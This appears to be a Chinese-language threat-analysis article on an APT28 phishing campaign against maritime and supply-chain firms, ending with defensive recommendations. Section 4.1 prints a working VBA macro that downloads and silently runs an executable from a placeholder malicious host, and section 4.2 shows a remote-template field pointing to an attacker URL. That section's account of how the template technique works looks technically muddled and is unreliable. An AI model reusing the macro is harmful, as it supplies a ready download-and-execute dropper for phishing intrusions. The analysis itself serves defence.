APT28针对海事与供应链行业的全球钓鱼攻击战术分析

摘要

本文基于Maritime Fairtrade披露的最新威胁情报，系统研究俄罗斯背景高级持续性威胁组织APT28于2025年末至2026年初发起的、横跨欧洲、美洲与亚洲的全球钓鱼行动。研究表明，该组织将航运公司、港口运营商及供应链关键节点作为重点目标，通过高度行业定制化的社会工程邮件投递恶意Office文档或诱导访问托管站点，旨在窃取敏感物流数据、港口运营信息乃至潜在军事后勤情报。攻击技术虽沿用宏指令执行与远程模板注入等成熟手法，但其诱饵内容（如船期变更通知、关务费用更新、安全合规通告）深度贴合海事业务流程，显著提升打开率与交互意愿。本文详细拆解其攻击链结构，包括邮件构造、文档载荷机制、C2通信特征及后续横向移动路径，并结合可复现代码示例展示典型恶意宏行为与WebDAV载荷加载过程。在此基础上，评估当前海事行业在邮件安全、终端防护与网络分段方面的薄弱环节，提出融合上下文感知邮件过滤、无宏文档策略、OT/IT网络隔离及员工场景化培训的纵深防御框架。研究指出，面对具备国家级资源支持、战术高度适配行业特性的APT28，传统通用型安全措施已显不足，需构建以业务流程为锚点的主动防御体系。

关键词：APT28；海事安全；供应链攻击；鱼叉式钓鱼；Office宏；远程模板注入；网络分段

1 引言

随着全球贸易对数字化与自动化依赖程度的加深，海事与供应链基础设施日益成为国家级网络攻击的重点目标。港口操作系统、船舶自动识别系统（AIS）、货运管理系统（TMS）及海关电子数据交换平台所承载的物流动态、货物清单与设施布局信息，不仅具有商业价值，更可能被用于推演军事后勤能力或干扰关键物资流动。在此背景下，俄罗斯关联的高级持续性威胁组织APT28（又名Fancy Bear、Sofacy、STRONTIUM）于2025年末启动新一轮全球钓鱼行动，其攻击范围覆盖至少12个国家，重点聚焦航运企业、港口管理机构及跨国供应链服务商。

APT28自2004年起活跃，以精准打击政府、军事、能源及选举相关目标著称，其标志性能力包括长期潜伏、多阶段后门部署及利用零日漏洞。此次转向海事与供应链领域，被视为其情报搜集任务从纯政治军事向经济战略维度的扩展。值得注意的是，尽管技术手段未出现根本性创新——仍主要依赖含宏Office文档与远程模板注入——但其社会工程内容高度专业化：邮件主题模仿真实业务场景，附件命名符合行业惯例（如“MAERSK_VESSEL_SCHEDULE_UPDATE_Q4.xlsx”），正文措辞引用专业术语（如“berth allocation”、“customs clearance delay”），极大削弱了目标警惕性。

本文旨在深入剖析APT28此次行动的技术实现细节与战术逻辑，揭示其如何利用行业知识提升攻击效率，并评估现有防御体系的应对能力。全文结构如下：第二部分概述APT28组织背景及其近期战略转向；第三部分详细解析钓鱼邮件构造与载荷投递机制；第四部分分析恶意文档执行流程与C2通信特征；第五部分探讨海事行业特有的安全脆弱性；第六部分提出针对性防御增强策略；第七部分总结研究发现。

2 APT28组织背景与战略转向

APT28隶属于俄罗斯总参谋部情报总局（GRU）第85特种服务中心（Unit 26165），其行动具有明确的国家利益导向。历史攻击包括2015年针对德国议会、2016年入侵民主党全国委员会、2020年针对新冠疫苗研发机构等。其TTPs（战术、技术与程序）以高隐蔽性、强持久性与精准打击为特征，常结合鱼叉式钓鱼、水坑攻击与凭证窃取实现初始访问。

2023年以色列—哈马斯冲突爆发后，APT28活动显著增加，开始频繁利用地缘事件作为诱饵。2024年起，其目标范围逐步扩展至乌克兰、波兰及北约成员国的国防承包商与能源企业。至2025年，观察到其攻击重心向海事与供应链领域迁移，原因可能包括：

获取全球关键航道船舶动态，辅助战略态势感知；

掌握港口装卸能力与仓储布局，评估战时后勤瓶颈；

渗透跨国物流公司，为未来供应链中断攻击预置跳板。

此次行动中，APT28针对阿根廷、格鲁吉亚、哈萨克斯坦、亚美尼亚、阿塞拜疆及美国的航运与港口企业发起攻击，邮件语言涵盖英语、西班牙语及俄语，体现出其多区域协同作业能力。

3 钓鱼邮件构造与载荷投递机制

APT28的钓鱼邮件遵循高度标准化的模板，但内容根据目标所在国家与企业类型动态调整。

3.1 社会工程内容设计

典型邮件主题包括：

“URGENT: Revised Berthing Schedule for Vessel MSC Laura – Action Required”

“Customs Authority Notice: Additional Documentation Needed for Shipment #IL-2026-0187”

“Port Security Alert: Mandatory Compliance Training Attached”

正文通常以官方口吻撰写，声称来自港口管理局、海关代理或合作船公司，并强调“时间敏感”或“合规强制”，制造紧迫感。发件人地址常伪造为合法域名（如 portauthority[.]ge、customs[.]kz），或使用视觉近似域名（如 port-authoriity[.]com）。

3.2 恶意附件与链接

附件多为.docx或.xlsx文件，命名包含船名、提单号或港口代码，例如“HAMBURG_PORT_ACCESS_FORM_2026.docx”。部分邮件不附文件，而是在正文中嵌入伪装为“查看完整通知”的超链接，指向APT28控制的WebDAV服务器。

4 恶意文档执行流程与C2通信

APT28此次行动主要采用两类载荷投递方式：本地宏执行与远程模板注入。

4.1 含宏文档的本地执行

文档启用“内容被禁用”提示，诱导用户点击“启用内容”。一旦启用，嵌入的VBA宏自动执行，其核心功能为下载并运行第二阶段载荷。典型宏代码如下：

Sub AutoOpen()

Dim url As String, filePath As String

url = "http://malicious-server[.]com/payload.exe"

filePath = Environ("TEMP") & "\update.exe"

Dim WinHttpReq As Object

Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")

WinHttpReq.Open "GET", url, False

WinHttpReq.Send

If WinHttpReq.Status = 200 Then

Dim oStream As Object

Set oStream = CreateObject("ADODB.Stream")

oStream.Type = 1

oStream.Open

oStream.Write WinHttpReq.ResponseBody

oStream.SaveToFile filePath, 2

Shell filePath, 0

End If

End Sub

此代码通过XMLHTTP对象下载EXE文件至临时目录并静默执行，规避部分基于文件扩展名的检测。

4.2 远程模板注入（Remote Template Injection）

更隐蔽的手法是利用Word的“外部模板”功能。文档本身不含宏，但在Normal.dotm模板加载时，从远程服务器拉取恶意.dotm文件。攻击者构造如下字段：

{INCLUDETEXT "http://attacker[.]xyz/template.dotm" \* MERGEFORMAT}

当用户打开文档，Word自动请求该URL并执行其中的AutoOpen宏。由于请求使用HTTP而非HTTPS，且User-Agent为标准Office标识，常被防火墙放行。

4.3 C2通信与后门功能

成功部署后，APT28常用MASEPIE、OCEANMAP或STEELHOOK等定制后门。以MASEPIE为例，其通过HTTPS与C2通信，使用Base64编码传输窃取的浏览器Cookie、凭据及文件列表。部分样本利用Ubiquiti路由器作为跳板，将C2流量伪装为正常IoT设备通信。

5 海事行业特有的安全脆弱性

海事与供应链行业在网络安全方面存在结构性短板，为APT28提供了可乘之机。

5.1 业务连续性优先于安全

港口与航运企业普遍强调操作效率与业务连续性，导致安全策略妥协。例如，为避免延误，一线员工被授权直接处理外部邮件附件，且IT部门常延迟应用安全补丁以防系统中断。

5.2 OT/IT网络边界模糊

现代港口依赖工业控制系统（ICS）管理起重机、闸口与堆场，但这些OT网络常与办公IT网络互联，且缺乏有效分段。一旦钓鱼邮件在办公终端得手，攻击者可轻易横向移动至OT域，威胁物理操作安全。

5.3 第三方协作增加攻击面

供应链涉及货代、报关行、检验机构等多方协作，邮件往来频繁。APT28常冒充可信第三方发送“合作文件”，利用既有业务信任关系绕过怀疑。

6 防御增强策略

针对APT28的行业定制化攻击，需采取以下多层防御措施：

6.1 邮件网关强化

部署支持上下文感知的邮件安全网关，不仅检测已知恶意域名，还需分析邮件内容与目标岗位的相关性。例如，若收件人为财务人员却收到“船期变更”邮件，应标记为可疑。

6.2 禁用Office宏与远程模板

在全组织范围内实施“无宏策略”：通过组策略禁用所有Office应用程序的宏执行，并阻止从互联网加载模板。对于必须使用宏的业务流程，应迁移到专用隔离环境。

6.3 OT/IT网络严格分段

依据NIST SP 800-82指南，将OT网络与IT网络物理或逻辑隔离，仅允许经审批的单向数据流（如日志上传）。关键控制系统应部署在独立VLAN，并实施最小权限访问控制。

6.4 场景化员工培训

开展针对性安全意识培训，模拟真实钓鱼场景：“您收到一封来自‘Rotterdam Port Authority’的邮件，要求下载‘新安全协议’，请判断是否合规。”培训应强调：所有船期、关务或安全文件必须通过内部TMS或EDI系统核实，不得依赖邮件附件。

6.5 威胁情报共享

加入海事行业ISAC（信息共享与分析中心），实时交换APT28使用的短域名、IP、文档哈希等指标，并自动化同步至本地防御系统。

7 结论

APT28对海事与供应链行业的全球钓鱼行动，标志着国家级APT组织正系统性渗透全球经济命脉基础设施。其攻击虽未采用前沿漏洞利用技术，但凭借对行业业务流程的深刻理解与高度定制化的社会工程内容，实现了远高于通用钓鱼的成功率。本文通过技术拆解与防御分析表明，有效应对需超越传统边界防护思维，转向以业务上下文为驱动、OT/IT协同、人机结合的纵深防御模式。未来工作应聚焦于构建海事专用威胁情报框架、开发基于业务语义的邮件异常检测模型，以及推动国际海事组织（IMO）网络安全指南的强制实施，以系统性提升全球供应链的网络韧性。

编辑：芦笛（公共互联网反网络钓鱼工作组）